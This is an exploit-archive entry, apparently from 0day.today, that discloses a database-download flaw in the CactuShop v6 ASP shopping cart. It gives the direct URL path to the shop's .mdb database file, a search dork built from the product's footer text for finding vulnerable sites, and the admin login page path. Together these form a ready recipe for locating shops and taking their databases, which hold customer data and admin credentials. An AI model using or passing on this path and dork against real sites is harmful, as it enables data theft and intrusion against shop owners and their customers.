id: 10434
date: 12/26/2009
title: CactuShop v6 Database Disclosure Vulnerability
author: LionTurk
cves: 

==============================================
CactuShop v6 Database Disclosure Vulnerability
==============================================

########################################################################### 
 
    
 
===[ Exploit And Dork  ]=== 
 
    
 
  [&#65533;] http://[target].com/[path]/database/cactushop6.mdb
 
  
 
 
  [&#65533;] CactuShop v6 ASP Shopping Cart &#65533;1999-2006 Cactusoft International FZ-LLC & Cactusoft Ltd. All rights reserved.
 
 
  [&#65533;]   Admin Page: /_login.asp?
 
 
 
 
Author:  LionTurk <-  



#  0day.today [2023-03-22]  #